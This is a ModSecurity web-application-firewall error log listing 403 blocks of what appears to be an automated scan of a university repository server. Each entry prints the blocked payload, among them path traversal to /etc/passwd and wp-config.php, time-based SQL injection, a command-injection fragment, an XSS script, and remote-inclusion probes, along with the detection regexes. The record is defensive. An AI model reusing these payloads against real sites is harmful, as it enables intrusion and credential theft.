[Tue Aug 29 11:43:06.414403 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:style_name: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/pub/bscw.cgi/30"] [unique_id "ZO13WsCo-f0AAAeYbz8AAAAB"]
[Tue Aug 29 11:43:08.041489 2023] [:error] [pid 1917] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/servlet/taskProc"] [unique_id "ZO13XMCo-f0AAAd9UO0AAAAr"]
[Tue Aug 29 11:43:08.633442 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lang: english|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/maint/modules/home/index.php"] [unique_id "ZO13XMCo-f0AAARpg5UAAAAU"]
[Tue Aug 29 11:43:09.369456 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/MicroStrategy/servlet/taskProc"] [unique_id "ZO13XcCo-f0AAAeYb0sAAAAB"]
[Tue Aug 29 11:43:09.375186 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "ZO13XcCo-f0AAAdSZQYAAAAX"]
[Tue Aug 29 11:43:10.377350 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:download_file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13XsCo-f0AAAXNuZQAAAAg"]
[Tue Aug 29 11:43:11.394965 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php"] [unique_id "ZO13X8Co-f0AAAcoNoAAAAAF"]
[Tue Aug 29 11:43:14.538021 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpv-image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:wpv-image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO13YsCo-f0AAAcoNowAAAAF"]
[Tue Aug 29 11:43:15.464309 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13Y8Co-f0AAActbPkAAAAH"]
[Tue Aug 29 11:43:18.405290 2023] [:error] [pid 1969] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../LocalConfiguration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php"] [unique_id "ZO13ZsCo-f0AAAexIAkAAAAN"]
[Tue Aug 29 11:43:18.423626 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/document.php"] [unique_id "ZO13ZsCo-f0AAAc@cboAAAAL"]
[Tue Aug 29 11:43:20.435171 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:cpath: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/fmangersub"] [unique_id "ZO13aMCo-f0AAAc@cb4AAAAL"]
[Tue Aug 29 11:43:21.419975 2023] [:error] [pid 1920] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13acCo-f0AAAeAW7sAAAAu"]
[Tue Aug 29 11:43:21.535490 2023] [:error] [pid 1973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../ found within ARGS:file: /../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO13acCo-f0AAAe1eeUAAAAB"]
[Tue Aug 29 11:43:22.541127 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:token: {{token}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO13asCo-f0AAAdQ3ncAAAAV"]
[Tue Aug 29 11:43:23.365726 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13a8Co-f0AAAcvBn4AAAAJ"]
[Tue Aug 29 11:43:27.673477 2023] [:error] [pid 1984] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:id[1]: =(SELECT/**/1/**/WHERE/**/SLEEP(6))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-json/notificationx/v1/notification/1"] [unique_id "ZO13b8Co-f0AAAfAOZ4AAAAH"]
[Tue Aug 29 11:43:28.611068 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(0)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13cMCo-f0AAAe397EAAAAA"]
[Tue Aug 29 11:43:29.514053 2023] [:error] [pid 1989] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(10)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13ccCo-f0AAAfFJ@0AAAAR"]
[Tue Aug 29 11:43:31.404143 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13c8Co-f0AAAXNucQAAAAg"]
[Tue Aug 29 11:43:31.416723 2023] [:error] [pid 1984] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:locale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:locale: ../../../../../../../lib/password.properties\\x00en"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/CFIDE/administrator/enter.cfm"] [unique_id "ZO13c8Co-f0AAAfAOaIAAAAH"]
[Tue Aug 29 11:43:36.439903 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13eMCo-f0AAAXNudEAAAAg"]
[Tue Aug 29 11:43:37.433303 2023] [:error] [pid 1994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ebookdownloadurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:ebookdownloadurl: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/ebook-download/filedownload.php"] [unique_id "ZO13ecCo-f0AAAfK-C8AAAAW"]
[Tue Aug 29 11:43:40.414167 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:m(?:s(?:ysaccessobjects|ysaces|ysobjects|ysqueries|ysrelationships|ysaccessstorage|ysaccessxml|ysmodules|ysmodules2|db)|aster\\\\.\\\\.sysdatabases|ysql\\\\.db)|s(?:ys(?:\\\\.database_name|aux)|chema(?:\\\\W*\\\\(|_name)|qlite(_temp)?_master)|d(?:atabas|b_n ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "84"] [id "981320"] [rev "2"] [msg "SQL Injection Attack: Common DB Names Detected"] [data "Matched Data: db_name( found within XML: \\x0a  \\x0a    \\x0a      1=db_name(1)\\x0a    \\x0a  \\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/iOffice/prg/set/wss/udfmr.asmx"] [unique_id "ZO13fMCo-f0AAAXNudcAAAAg"]
[Tue Aug 29 11:43:40.459963 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) =  found within ARGS:q: 20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null  OR (1 1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO13fMCo-f0AAAfBL0kAAAAI"]
[Tue Aug 29 11:43:42.415494 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pow. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:pow: sds\\x22><script>alert(document.domain)</script><\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/Solar_SlideSub.php"] [unique_id "ZO13fsCo-f0AAAdxUYAAAAAC"]
[Tue Aug 29 11:43:44.378165 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:valore. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:valore: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/file"] [unique_id "ZO13gMCo-f0AAAdftbgAAAAG"]
[Tue Aug 29 11:43:45.364691 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:s_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:s_id: 1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/arcade.php"] [unique_id "ZO13gcCo-f0AAAdb7sUAAAAb"]
[Tue Aug 29 11:43:47.421739 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/render.html"] [unique_id "ZO13g8Co-f0AAAdb7s8AAAAb"]
[Tue Aug 29 11:43:48.426911 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:step. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:step: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/ad-widget/views/modal/"] [unique_id "ZO13hMCo-f0AAAeX1JEAAAAK"]
[Tue Aug 29 11:43:48.438208 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13hMCo-f0AAARpg-oAAAAU"]
[Tue Aug 29 11:43:49.475448 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/alerts/alertLightbox.php"] [unique_id "ZO13hcCo-f0AAAe8l4sAAAAF"]
